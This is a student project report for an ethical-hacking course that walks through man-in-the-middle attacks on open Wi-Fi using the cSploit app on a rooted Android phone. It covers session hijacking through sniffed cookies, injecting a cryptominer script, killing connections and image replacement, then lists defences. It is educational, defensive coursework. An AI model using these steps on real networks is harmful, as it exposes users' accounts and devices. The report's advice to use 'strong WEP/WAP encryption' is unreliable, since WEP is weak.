MITM with Android device


Certified Ethical Hacking Professional


Indian Cyber Security Solutions


Project report


[MITM with Android device]


Author: Priyam Harsh

(Under guidance of Pritam Sir)




  1. Introduction
  1. Demonstration
  1. Prevention
  1. Conclusion



According to the Wikipedia, in cryptography and computer security, a man-in-the-middle attack (MITM) is an attack where the attacker secretly relays and possibly alters the communication between two parties who believe they are directly communicating with each other. One example of a MITM is active eavesdropping, in which the attacker makes independent connections with the victims and relays messages between them to make them believe they are talking directly to each other over a private connection, when in fact the entire conversation is controlled by the attacker. The attacker must be able to intercept all relevant messages passing between the two victims and inject new ones. This is straightforward in many circumstances; for example, an attacker within reception range of an unencrypted wireless access point (Wi-Fi) could insert himself as a man-in-the-middle.

Now, I would be demonstrating a MITM attack using a rooted Android phone. Since, Android is a Linux-based Operating System, we can do quite a lot of stuffs a Linux Machine can do. So, without wasting any moment, lets dive right into it.




  • Rooted Android Phone
  • A unencrypted access point (an open WiFi)
  • cSploit App

First of all, we will understand how MITM attack works. Let’s take an example, Alice and Bob are having a conversation; Eve wants to eavesdrop on the conversation but also remain transparent. Eve could tell Alice that she was Bob and tell Bob that she was Alice. This would lead Alice to believe she’s speaking to Bob, while actually revealing her part of the conversation to Eve. Eve could then gather information from this, alter the response, and pass the message along to Bob (who thinks he’s talking to Alice). As a result, Eve is able to transparently hijack their conversation.  This is how MITM works. The attacker intercept the traffic sent to and fro a access point and hence use this knowledge to initiate any kinds of MITM attacks like, session hijacking, script injection, website redirection and so on.


MITM using Android


So now, I will demonstrate some MITM attacks using an Android device. In order to start the MITM attacks, we need to get inside an open WiFi because the communication is not encrypted over the network. Once connected to a WiFi, we will start cSploit app. cSploit app was designed for penetration testing and security researches. It is quite a powerful tool and can also cause damage if used with wrong intentions.

As soon as we open cSploit app, the automatic network discovery is started and all the connected clients are displayed on the screen. We can see that it has also initiated information gathering by port scanning all the clients in the WiFi. Since we are concerned with the Man-In-The-Middle attacks, we will select a victim or we can also select the whole network subnet to perform the attacks.

I have selected a client in the WiFi to become a victim of the attacks. Once selecting the target client(s), we are presented with several options including Trace Route, Port Scanning, Service Inspector, Exploit Finder and so on. Now, we will select MITM option.

After selecting MITM option, we can see all the kinds of attacks we can initiate on the target. We can sniff the traffic and passwords, spoof the DNS, hijack session, kill the connection, redirect the traffic to other website, replace images on the website and inject a script on every webpage.


If we want to kill the internet connection of any specific target or everyone in the network, we can use ‘Kill Connection’ option. As soon as we start this attack, the target will lose the internet connectivity. In simpler words, the attacker, being the middle man in the communication between the victim and the internet, will cut off all the outgoing and incoming requests from the victim.


If we want to inject a script file into every webpage, the victim is going to visit; we will use ‘Script Injection’ option. It is one of the most powerful attacks because any attacker can inject any kind of malicious script file. For example, there is a javascript cryptocurrency miner available in the market named Coinhive. This piece of script, provided by the Coinhive website, offers an another source of income for any website administrator. Any website admin can sign up for Coinhive and can embed the JavaScript miner to their websites. When any user visits the website, embedded with the Coinhive script, that script will start to run the miner directly into their browser, mining for cryptocurrency anonymously in the background using CPU’s power. This tool was designed as an alternative revenue-gathering method for website admin, who are looking to get rid of unwanted ads, taking all the space in their webite. Even though, this tool help to mine Monero (cryptocurrency), which is less valuable than BitCoins, but still, its in the top 10 cryptocurrency in the world. Coinhive itself is a completely legitimate company, but this service can be abused by hacker in order to earn quick money. The hackers can inject the JavaScript miner into any webpages of unsuspecting coffee shop goer or any public wifi user, as they browse the internet. Any hacker with a good knowledge of wireless attacks can use Man-in-the-middle in any Public Hostspots, to inject this script to the users.


Session hijacking is another most powerful attack where attacker can directly listen for cookies on the network and hijack any user session. For example, a victim logs into Flipkart using his/her credentials. An attacker can try to sniff the cookies and he can hijack that user session by using the cookies of the victim. Now, he would have full access to his/her Flipkart account.

In cSploit, whenever the target will try to visit any website, the request and the cookies will automatically be captured and we can directly hijack any of the session as per our need.


In this attack, whenever the target will open any website, every image on the webpage will be replaced with the image selected by the attacker. Once selected the replace image attack in cSploit, we would be prompted for selecting a local image or a web url for the image. After selecting the image, the attack is started.

There are bunch of other attacks too. If used in a wrong way, this can really damage the privacy and the data of any person(s).






Strong WEP/WAP Encryption on Access Points

Having a strong encryption mechanism on wireless access points prevents unwanted users from joining your network just by being nearby. A weak encryption mechanism can allow an attacker to brute-force his way into a network and begin man-in-the-middle attacking. The stronger the encryption implementation, the safer it is going to be.


Virtual Private Network

VPNs can be used to create a secure environment for sensitive information within a local area network. They use key-based encryption to create a subnet for secure communication. This way, even if an attacker happens to get on a network that is shared, he will not be able to decipher the traffic in the VPN.



HTTPS can be used to securely communicate over HTTP using public-private key exchange. This prevents an attacker from having any use of the data he may be sniffing. Websites should only use HTTPS and not provide HTTP alternatives. Users can install browser plugins to enforce always using HTTPS on requests.


Public Key Pair Based Authentication

Man-in-the-middle attacks typically involve spoofing something or another. Public key pair based authentication like RSA can be used in various layers of the stack to help ensure whether the things you are communicating with are actually the things you want to be communicating with.



In the conclusion, I would like to say that this cyber world is developing every day and so does the cyber-attacks. With every new advancement in technology, there comes a new bug, new vulnerabilities and new exploits ready to be misused and exploit. After getting my training for C|EHP, now I can say that I am one of those amazing people whose job is to find this bugs and vulnerability and to create a hack-proof environment for everyone.


Thank you for your attention.